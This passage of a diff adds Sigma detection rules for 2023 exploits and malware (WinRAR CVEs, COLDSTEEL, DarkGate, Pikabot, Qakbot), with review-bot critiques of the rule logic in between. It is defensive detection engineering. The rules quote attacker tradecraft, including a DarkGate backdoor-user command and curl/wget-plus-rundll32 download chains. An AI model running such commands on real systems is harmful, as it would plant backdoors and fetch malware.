+ - 172.29.
+ - 172.30.
+ - 172.31.
+ - '127.' # 127.0.0.0/8
+ - 169.254. # 169.254.0.0/16
+ condition: smbclient_connectivity and (selection and not 1 of filter_main_*)
+falsepositives:
+ - Some false positives may occur from external trusted servers. Apply additional filters accordingly
+level: medium
+ruletype: Sigma
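Review bot: `filter_main_local_ips` lists only IPv4 RFC 1918, loopback and APIPA prefixes, so an IPv6 `ServerAddress` (link-local `fe80::`, ULA `fc00::/7`, `::1`) or the shared address space `100.64.0.0/10` that overlay VPNs commonly use is treated as "internet facing" and raises a `medium` alert for ordinary internal traffic. Add `- 'fe80:'`, `- 'fc'`, `- 'fd'` and `- '::1'` to the list, and cover the CGNAT range with `ServerAddress|cidr: 100.64.0.0/10` if the converter supports the modifier, since `startswith` cannot express a /10. A comment noting the filter is a prefix test rather than a real CIDR match would also keep the next person from assuming `172.16.` alone covers the /12 — it does only because all sixteen /16s are spelled out.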
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml
new file mode 100644
index 000000000..5fcb96159
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml
@@ -0,0 +1,32 @@
+title: Potential CVE-2023-36884 Exploitation - Share Access
+id: 3df95076-9e78-4e63-accb-16699c3b74f8
+status: experimental
+description: Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884
+references:
+ - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/07/13
+tags:
+ - attack.command_and_control
+ - cve.2023.36884
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: security
+ definition: The advanced audit policy setting "Object Access > Audit File Share" must be configured for Success/Failure
+detection:
+ security:
+ Channel: Security
+ selection_eid:
+ EventID: 5140
+ selection_share_name:
+ ShareName|contains: \MSHTML_C7\
+ ShareName|re: '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
+ selection_share_path:
+ ShareLocalPath|contains: \MSHTML_C7\
+ ShareLocalPath|re: '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
+ condition: security and (selection_eid and 1 of selection_share_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
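Review bot: Security 5140 is written by the host that serves the share, not by the client whose Office process reaches out, so as far as I understand the event this rule fires only when the `\MSHTML_C7\` staging share is hosted on a monitored Windows machine — it does not see a victim connecting to an attacker's external share; that scoping belongs in the description so nobody treats it as endpoint-side coverage of the exploit. Suggested addition to `description`: `Note: 5140 is logged by the SMB server hosting the share; this detects internal hosts serving the exploit share, not clients reaching an external one.` The IP-shaped `|re` is combined with `|contains: \MSHTML_C7\` inside the same map, i.e. an AND, which is fine, but a comment saying the regex expects the IP to appear inside the share name/path as in the BlackBerry write-up would save a reader from wondering why it isn't matched against the client address.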
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml
new file mode 100644
index 000000000..fed5935a0
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml
@@ -0,0 +1,46 @@
+title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process
+id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343
+related:
+ - id: e4556676-fc5c-4e95-8c39-5ef27791541f
+ type: similar
+status: experimental
+description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
+references:
+ - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
+ - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md
+author: Nasreddine Bencherchali (Nextron Systems), Andreas Braathen (mnemonic.io)
+date: 2023/08/30
+tags:
+ - detection.emerging_threats
+ - attack.execution
+ - attack.t1203
+ - cve.2023.38331
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_parent:
+ ParentProcessName|endswith: \WinRAR.exe
+ selection_folder:
+ CommandLine|contains: \AppData\Local\Temp\Rar$
+ selection_double_ext:
+ CommandLine|re: \.[a-zA-Z0-9]{1,4} \.
+ selection_binaries:
+ # Note: add additional binaries that the attacker might use
+ - NewProcessName|endswith:
+ - \cmd.exe
+ - \wscript.exe
+ - OriginalFileName:
+ - Cmd.Exe
+ - cscript.exe
+ - PowerShell.EXE
+ - pwsh.dll
+ - wscript.exe
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml
new file mode 100644
index 000000000..d0076ebdc
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml
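Review bot: The title, description and `cve.2023.38331` tag transpose the CVE digits — the references, the file name and the `related` rule all say CVE-2023-38831 — so the three occurrences of `38331` should be corrected or the rule will not be found by CVE search. Separately, `selection_binaries` is an OR between `NewProcessName|endswith` (only `\cmd.exe`, `\wscript.exe`) and `OriginalFileName`, but `OriginalFileName` is not a field of Security 4688, so on this log source `cscript.exe`, `PowerShell.EXE` and `pwsh` children of `WinRAR.exe` are silently uncovered; mirror them into the `NewProcessName|endswith` list (`\cscript.exe`, `\powershell.exe`, `\pwsh.exe`) and add `# OriginalFileName is Sysmon-only; keep the NewProcessName list complete for 4688`.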
@@ -0,0 +1,37 @@
+title: CVE-2023-40477 Potential Exploitation - WinRAR Application Crash
+id: e5a29b54-6fe7-4258-8a23-82960e31231a
+status: experimental
+description: Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477
+references:
+ - https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/
+ - https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC
+ - https://www.rarlab.com/vuln_rev3_names.html
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/08/31
+tags:
+ - attack.execution
+ - cve.2023.40477
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: application
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: Application Error
+ EventID: 1000
+ AppName: WinRAR.exe
+ filter_main_fixed_version:
+ # TODO: fix this when the "lt" modifier is implemented for software versions
+ AppVersion|startswith:
+ - 6.23.
+ - 6.24.
+ - 6.25.
+ - 6.26.
+ - '7.'
+ condition: application and (selection and not 1 of filter_main_*)
+falsepositives:
+ - Legitimate crash for reasons other than exploitation of the vulnerability
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml
new file mode 100644
index 000000000..16ef41993
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml
@@ -0,0 +1,26 @@
+title: MSMQ Corrupted Packet Encountered
+id: ae94b10d-fee9-4767-82bb-439b309d5a27
+status: experimental
+description: Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation
+references:
+ - https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/04/21
+tags:
+ - attack.execution
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: application
+detection:
+ application:
+ Channel: Application
+ selection:
+ Provider_Name: MSMQ
+ EventID: 2027
+ Level: 2
+ condition: application and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml
new file mode 100644
index 000000000..e9e6fcf11
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml
@@ -0,0 +1,29 @@
+title: COLDSTEEL RAT Anonymous User Process Execution
+id: e01b6eb5-1eb4-4465-a165-85d40d874add
+status: experimental
+description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL
+references:
+ - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/04/30
+tags:
+ - attack.persistence
+ - attack.defense_evasion
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ ParentProcessName|contains:
+ - \Windows\System32\
+ - \AppData\
+ SubjectUserName|contains: ANONYMOUS
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml
new file mode 100644
index 000000000..b5c42591e
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml
@@ -0,0 +1,30 @@
+title: COLDSTEEL RAT Service Persistence Execution
+id: 9f9cd389-cea0-4142-bf1a-a3fd424abedd
+status: experimental
+description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
+references:
+ - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
+author: X__Junior (Nextron Systems)
+date: 2023/04/30
+tags:
+ - attack.persistence
+ - attack.defense_evasion
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|endswith:
+ - ' -k msupdate'
+ - ' -k msupdate2'
+ - ' -k alg'
+ NewProcessName|endswith: \svchost.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml
new file mode 100644
index 000000000..621561baf
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml
@@ -0,0 +1,31 @@
+title: Potential COLDSTEEL RAT Windows User Creation
+id: 95214813-4c7a-4a50-921b-ee5c538e1d16
+status: experimental
+description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT.
+references:
+ - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/02
+modified: 2023/08/17
+tags:
+ - attack.persistence
+ - detection.emerging_threats
+logsource:
+ category: registry_set
+ product: windows
+detection:
+ registry_set:
+ EventID: 4657
+ Channel: Security
+ selection:
+ ObjectName|contains|all:
+ - \SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-
+ - \ProfileImagePath
+ NewValue|contains:
+ - ANONYMOUS
+ - _DomainUser_
+ condition: registry_set and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml
new file mode 100644
index 000000000..a1e270191
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml
@@ -0,0 +1,31 @@
+title: COLDSTEEL Persistence Service Creation
+id: 3ced239c-7285-4b54-99c4-8525b69293f7
+status: test
+description: Detects the creation of new services potentially related to COLDSTEEL RAT
+references:
+ - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/02
+tags:
+ - attack.defense_evasion
+ - attack.persistence
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: system
+detection:
+ system:
+ Channel: System
+ selection:
+ Provider_Name: Service Control Manager
+ EventID: 7045
+ ServiceName:
+ - Name
+ - msupdate
+ - msupdate2
+ ImagePath|contains: \Windows\System32\svchost.exe
+ condition: system and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml
new file mode 100644
index 000000000..befa6a640
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml
@@ -0,0 +1,41 @@
+title: DarkGate - Autoit3.EXE Execution Parameters
+id: f8e9aa1c-14f2-4dbd-aa59-b98968ed650d
+status: experimental
+description: |
+ Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within
+ the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate
+ command-and-control server.
+references:
+ - https://github.security.telekom.com/2023/08/darkgate-loader.html
+ - https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware
+ - https://github.com/pr0xylife/DarkGate/tree/main
+author: Micah Babinski
+date: 2023/10/15
+tags:
+ - attack.execution
+ - attack.t1059
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_proc:
+ - NewProcessName|endswith: \Autoit3.exe
+ - OriginalFileName: AutoIt3.exe
+ selection_parent:
+ ParentProcessName|endswith:
+ - \cmd.exe
+ - \KeyScramblerLogon.exe
+ - \msiexec.exe
+ filter_main_legit_autoit_location:
+ NewProcessName|endswith:
+ - :\Program Files (x86)\AutoIt3\AutoIt3.exe
+ - :\Program Files\AutoIt3\AutoIt3.exe
+ condition: process_creation and (all of selection_* and not 1 of filter_main_*)
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml
new file mode 100644
index 000000000..5cc0bceca
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml
@@ -0,0 +1,35 @@
+title: DarkGate - User Created Via Net.EXE
+id: bf906d7b-7070-4642-8383-e404cf26eba5
+status: experimental
+description: Detects creation of local users via the net.exe command with the name of "DarkGate"
+references:
+ - Internal Research
+author: X__Junior (Nextron Systems)
+date: 2023/08/27
+modified: 2023/10/15
+tags:
+ - attack.persistence
+ - attack.t1136.001
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ # /c net user /add SafeMode DarkGate0!
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - user
+ - add
+ - DarkGate
+ - SafeMode
+ NewProcessName|endswith:
+ - \net.exe
+ - \net1.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml
new file mode 100644
index 000000000..309d7c208
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml
@@ -0,0 +1,28 @@
+title: Griffon Malware Attack Pattern
+id: bcc6f179-11cd-4111-a9a6-0fab68515cf7
+status: experimental
+description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
+references:
+ - https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/03/09
+tags:
+ - attack.execution
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - \local\temp\
+ - //b /e:jscript
+ - .txt
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml
new file mode 100644
index 000000000..b787c5815
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml
@@ -0,0 +1,30 @@
+title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32
+id: 2bd8e100-5b3b-4b6a-bbb5-b129d3ddddc5
+status: experimental
+description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID
+references:
+ - https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/
+ - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/08/31
+tags:
+ - attack.defense_evasion
+ - attack.t1218.011
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|endswith:
+ - \1.dll, DllRegisterServer # In case of full path exec
+ - ' 1.dll, DllRegisterServer' # In case of direct exec
+ NewProcessName|endswith: \rundll32.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml
new file mode 100644
index 000000000..eb0b05b05
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml
@@ -0,0 +1,48 @@
+title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
+id: e5144106-8198-4f6e-bfc2-0a551cc8dd94
+status: experimental
+description: |
+ Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
+ Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files.
+ In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
+references:
+ - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt
+ - https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt
+author: Alejandro Houspanossian ('@lekz86')
+date: 2024/01/02
+tags:
+ - attack.execution
+ - attack.t1059.003
+ - attack.t1105
+ - attack.t1218
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_cmd:
+ CommandLine|contains|all:
+ - cmd
+ - /c
+ selection_pipes:
+ CommandLine|contains:
+ - ' & '
+ - ' || '
+ selection_commands_1:
+ CommandLine|contains:
+ - ' curl'
+ - ' wget'
+ - ' timeout '
+ - ' ping '
+ selection_commands_2:
+ CommandLine|contains:
+ - ' rundll32'
+ - ' mkdir '
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml
new file mode 100644
index 000000000..ef3cd6a8a
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml
@@ -0,0 +1,36 @@
+title: Potential Pikabot Discovery Activity - Suspicious Process Created By Rundll32.EXE
+id: 698d4431-514f-4c82-af4d-cf573872a9f5
+status: experimental
+description: |
+ Detects the execution of rundll32 that leads to system discovery activity, such as incl. network, user info and domain groups.
+ The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
+references:
+ - https://www.virustotal.com/gui/file/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242
+author: Andreas Braathen (mnemonic.io)
+date: 2023/10/27
+tags:
+ - attack.discovery
+ - attack.t1016
+ - attack.t1049
+ - attack.t1087
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+ definition: 'Requirements: By default the process_creation type event might not contain the GrandParentImage. Make sure you collect such fields in order to use this rule'
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ GrandParentImage|endswith: \rundll32.exe
+ CommandLine:
+ # Note: Only add strings as seen used by Pikabot to avoid collision with other strains of malware
+ - ipconfig.exe /all
+ - netstat.exe -aon
+ - whoami.exe /all
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml
new file mode 100644
index 000000000..61cb4db93
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml
@@ -0,0 +1,37 @@
+title: Potential Pikabot Hollowing Activity - Suspicious Process Created By Rundll32.EXE
+id: d8937fe7-42d5-4b4d-8178-e089c908f63f
+status: experimental
+description: |
+ Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries.
+ The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
+references:
+ - https://www.virustotal.com/gui/file/b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62
+author: Andreas Braathen (mnemonic.io)
+date: 2023/10/27
+tags:
+ - attack.defense_evasion
+ - attack.t1055.012
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ ParentProcessName|endswith: \rundll32.exe
+ NewProcessName|endswith:
+ # Note: Only add processes seen used by Pikabot to avoid collision with other strains of malware
+ - \searchprotocolhost.exe
+ - \sndvol.exe
+ - \wermgr.exe
+ - \wwahost.exe
+ filter_main_legit_sndvol:
+ ParentCommandLine|contains: mmsys.cpl
+ NewProcessName|endswith: \sndvol.exe
+ condition: process_creation and (selection and not 1 of filter_main_*)
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
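Review bot: `filter_main_legit_sndvol` keys on `ParentCommandLine`, which to my knowledge a Security 4688 event does not carry (the parent is only identified through `ParentProcessName`), so on this converted rule the filter is expected never to match and the `mmsys.cpl` → `sndvol.exe` case it was written to exclude will still fire at level high. If the field really is absent, either state that in `falsepositives` (e.g. `- Legitimate sndvol.exe launched from the mmsys.cpl control panel applet; the ParentCommandLine filter cannot be evaluated on 4688 events`) or narrow the `sndvol.exe` entry for the 4688 variant rather than silently carrying a dead filter. The neighbouring discovery rule has the same dependency on a field 4688 lacks (`GrandParentImage`), though its `logsource.definition` at least documents that requirement; a similar note would help here.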
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml
new file mode 100644
index 000000000..b4e75b47d
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml
@@ -0,0 +1,30 @@
+title: Qakbot Regsvr32 Calc Pattern
+id: 0033cf83-fb87-446d-9cac-43d63ad4d5a9
+status: experimental
+description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
+references:
+ - https://github.com/pr0xylife/Qakbot/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/26
+tags:
+ - attack.defense_evasion
+ - attack.execution
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains:
+ - ' /s'
+ - ' -s'
+ CommandLine|endswith: ' calc'
+ NewProcessName|endswith: \regsvr32.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml
new file mode 100644
index 000000000..13805359e
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml
@@ -0,0 +1,43 @@
+title: Potential Qakbot Rundll32 Execution
+id: cf879ffb-793a-4753-9a14-bc8f37cc90df
+status: experimental
+description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity.
+references:
+ - https://github.com/pr0xylife/Qakbot/
+author: X__Junior (Nextron Systems)
+date: 2023/05/24
+tags:
+ - attack.defense_evasion
+ - attack.execution
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_paths:
+ CommandLine|contains:
+ # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware
+ - :\ProgramData\
+ - :\Users\Public\
+ - \AppData\Local\Temp\
+ - \AppData\Roaming\
+ ParentProcessName|endswith:
+ # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware
+ - \cmd.exe
+ - \cscript.exe
+ - \curl.exe
+ - \mshta.exe
+ - \powershell.exe
+ - \pwsh.exe
+ - \wscript.exe
+ NewProcessName|endswith: \rundll32.exe
+ selection_extension:
+ CommandLine|contains: .dll
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml
new file mode 100644
index 000000000..d72dabfc0
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml
@@ -0,0 +1,71 @@
+title: Qakbot Rundll32 Exports Execution
+id: 339ed3d6-5490-46d0-96a7-8abe33078f58
+status: experimental
+description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
+references:
+ - https://github.com/pr0xylife/Qakbot/
+author: X__Junior (Nextron Systems)
+date: 2023/05/24
